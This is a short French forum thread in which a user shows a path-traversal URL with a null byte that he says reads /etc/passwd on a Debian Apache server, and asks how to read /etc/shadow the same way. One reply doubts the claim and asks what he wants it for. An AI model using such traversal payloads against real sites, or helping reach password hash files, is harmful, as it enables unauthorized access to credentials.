Fichier shadow sur un serveur web

gavroche30 Messages postés 1 Statut Membre -  
EminoMeneko Messages postés 2499 Statut Membre -
Bonjour



Sur un serveur web sous debian « apache2 » si je peux lire le fichier /etc/passwd

http://www.site.com/ap/?page==../../../../../../../../etc/passwd%00&idc=30&annee=2005%20HTTP/1.0

Comment je pourrais faire pour lire le fichier shadow

http://www.site.com/ap/?page==../../../../../../../../etc/shadow%00&idc=30&annee=2005%20HTTP/1.0

je pense que j’arrive a lire le fichier passwd avec les droit utilisateur du user www-data

Le fichier shadow il ya que le user root qui peut le lire ou le modifier !!!!!!!!!!!!!!!


???
A voir également:

1 réponse

EminoMeneko Messages postés 2499 Statut Membre 318
 
Normalement tu n'est pas en mesure de lire les fichiers hors de ton répertoire racine à moins que tu n'ai reconfiguré Apache. A quoi ceà pourrait bien te servir tout ça ?
0